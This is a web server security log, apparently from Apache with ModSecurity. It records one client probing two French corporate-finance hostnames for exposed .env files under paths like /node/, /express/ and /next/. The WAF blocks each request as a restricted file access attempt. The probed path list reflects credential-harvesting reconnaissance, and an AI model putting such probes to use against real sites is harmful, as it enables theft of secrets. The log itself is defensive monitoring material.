[Mon May 11 16:26:31.261039 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:40726] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /control-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/control-panel/.env"] [unique_id "agHnF1V4kyjgo4bQBUhUYQAAAMA"]
[Mon May 11 16:26:31.261288 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:40726] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/control-panel/.env"] [unique_id "agHnF1V4kyjgo4bQBUhUYQAAAMA"]
[Mon May 11 16:26:31.261813 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:40726] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:31.261959 2026] [security2:error] [pid 1416109:tid 1416129] [client 18.180.54.2:40726] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/control-panel/.env"] [unique_id "agHnF1V4kyjgo4bQBUhUYQAAAMA"]
[Mon May 11 16:26:31.373422 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:40738] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/node/.env"] [unique_id "agHnFw-Qm4vhlWBPlMi6KgAAAAM"]
[Mon May 11 16:26:31.373657 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:40738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/node/.env"] [unique_id "agHnFw-Qm4vhlWBPlMi6KgAAAAM"]
[Mon May 11 16:26:31.374134 2026] [core:error] [pid 1411099:tid 1411104] [client 18.180.54.2:40738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:31.374302 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:40738] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/node/.env"] [unique_id "agHnFw-Qm4vhlWBPlMi6KgAAAAM"]
[Mon May 11 16:26:31.965514 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:40740] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user-panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/user-panel/.env"] [unique_id "agHnF0WKUxpmnkK7zHx8FwAAAQ4"]
[Mon May 11 16:26:31.965753 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:40740] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/user-panel/.env"] [unique_id "agHnF0WKUxpmnkK7zHx8FwAAAQ4"]
[Mon May 11 16:26:31.966299 2026] [core:error] [pid 1411055:tid 1411071] [client 18.180.54.2:40740] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:31.966492 2026] [security2:error] [pid 1411055:tid 1411071] [client 18.180.54.2:40740] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/user-panel/.env"] [unique_id "agHnF0WKUxpmnkK7zHx8FwAAAQ4"]
[Mon May 11 16:26:32.055598 2026] [security2:error] [pid 1411201:tid 1411248] [client 18.180.54.2:40744] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/express/.env"] [unique_id "agHnGPy_GXSWIKeli0vybQAAAII"]
[Mon May 11 16:26:32.055820 2026] [security2:error] [pid 1411201:tid 1411248] [client 18.180.54.2:40744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/express/.env"] [unique_id "agHnGPy_GXSWIKeli0vybQAAAII"]
[Mon May 11 16:26:32.056332 2026] [core:error] [pid 1411201:tid 1411248] [client 18.180.54.2:40744] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:32.056493 2026] [security2:error] [pid 1411201:tid 1411248] [client 18.180.54.2:40744] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/express/.env"] [unique_id "agHnGPy_GXSWIKeli0vybQAAAII"]
[Mon May 11 16:26:32.715543 2026] [security2:error] [pid 1411055:tid 1411061] [client 18.180.54.2:40758] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/node/.env"] [unique_id "agHnGEWKUxpmnkK7zHx8GAAAAQQ"]
[Mon May 11 16:26:32.715769 2026] [security2:error] [pid 1411055:tid 1411061] [client 18.180.54.2:40758] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/node/.env"] [unique_id "agHnGEWKUxpmnkK7zHx8GAAAAQQ"]
[Mon May 11 16:26:32.716261 2026] [core:error] [pid 1411055:tid 1411061] [client 18.180.54.2:40758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:32.716437 2026] [security2:error] [pid 1411055:tid 1411061] [client 18.180.54.2:40758] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/node/.env"] [unique_id "agHnGEWKUxpmnkK7zHx8GAAAAQQ"]
[Mon May 11 16:26:32.747263 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:40762] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/next/.env"] [unique_id "agHnGA-Qm4vhlWBPlMi6LQAAAAc"]
[Mon May 11 16:26:32.747466 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:40762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/next/.env"] [unique_id "agHnGA-Qm4vhlWBPlMi6LQAAAAc"]
[Mon May 11 16:26:32.747975 2026] [core:error] [pid 1411099:tid 1411108] [client 18.180.54.2:40762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:32.748134 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:40762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/next/.env"] [unique_id "agHnGA-Qm4vhlWBPlMi6LQAAAAc"]
[Mon May 11 16:26:33.444980 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:40764] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /express/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/express/.env"] [unique_id "agHnGTJnyuKVXoStDha0-AAAAEs"]
[Mon May 11 16:26:33.445212 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:40764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/express/.env"] [unique_id "agHnGTJnyuKVXoStDha0-AAAAEs"]
[Mon May 11 16:26:33.445695 2026] [core:error] [pid 1412074:tid 1412087] [client 18.180.54.2:40764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:33.445871 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:40764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/express/.env"] [unique_id "agHnGTJnyuKVXoStDha0-AAAAEs"]
[Mon May 11 16:26:33.479664 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:40770] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/nuxt/.env"] [unique_id "agHnGUWKUxpmnkK7zHx8GgAAARE"]
[Mon May 11 16:26:33.479850 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:40770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/nuxt/.env"] [unique_id "agHnGUWKUxpmnkK7zHx8GgAAARE"]
[Mon May 11 16:26:33.480367 2026] [core:error] [pid 1411055:tid 1411074] [client 18.180.54.2:40770] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:33.480527 2026] [security2:error] [pid 1411055:tid 1411074] [client 18.180.54.2:40770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/nuxt/.env"] [unique_id "agHnGUWKUxpmnkK7zHx8GgAAARE"]
[Mon May 11 16:26:34.189063 2026] [security2:error] [pid 1411099:tid 1411115] [client 18.180.54.2:40784] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /next/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/next/.env"] [unique_id "agHnGg-Qm4vhlWBPlMi6LwAAAA8"]
[Mon May 11 16:26:34.189317 2026] [security2:error] [pid 1411099:tid 1411115] [client 18.180.54.2:40784] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/next/.env"] [unique_id "agHnGg-Qm4vhlWBPlMi6LwAAAA8"]
[Mon May 11 16:26:34.189821 2026] [core:error] [pid 1411099:tid 1411115] [client 18.180.54.2:40784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:34.189981 2026] [security2:error] [pid 1411099:tid 1411115] [client 18.180.54.2:40784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/next/.env"] [unique_id "agHnGg-Qm4vhlWBPlMi6LwAAAA8"]
[Mon May 11 16:26:34.226342 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:40788] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/nest/.env"] [unique_id "agHnGvy_GXSWIKeli0vycAAAAIE"]
[Mon May 11 16:26:34.226565 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:40788] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/nest/.env"] [unique_id "agHnGvy_GXSWIKeli0vycAAAAIE"]
[Mon May 11 16:26:34.227060 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:40788] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:34.227234 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.180.54.2:40788] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/nest/.env"] [unique_id "agHnGvy_GXSWIKeli0vycAAAAIE"]
[Mon May 11 16:26:34.932075 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:40804] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nuxt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/nuxt/.env"] [unique_id "agHnGvy_GXSWIKeli0vycQAAAJY"]
[Mon May 11 16:26:34.932322 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:40804] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/nuxt/.env"] [unique_id "agHnGvy_GXSWIKeli0vycQAAAJY"]
[Mon May 11 16:26:34.932801 2026] [core:error] [pid 1411201:tid 1411267] [client 18.180.54.2:40804] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:34.932960 2026] [security2:error] [pid 1411201:tid 1411267] [client 18.180.54.2:40804] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/nuxt/.env"] [unique_id "agHnGvy_GXSWIKeli0vycQAAAJY"]
[Mon May 11 16:26:34.967949 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:40820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/react/.env"] [unique_id "agHnGlV4kyjgo4bQBUhUaQAAANA"]
[Mon May 11 16:26:34.968187 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:40820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/react/.env"] [unique_id "agHnGlV4kyjgo4bQBUhUaQAAANA"]
[Mon May 11 16:26:34.968686 2026] [core:error] [pid 1416109:tid 1416146] [client 18.180.54.2:40820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
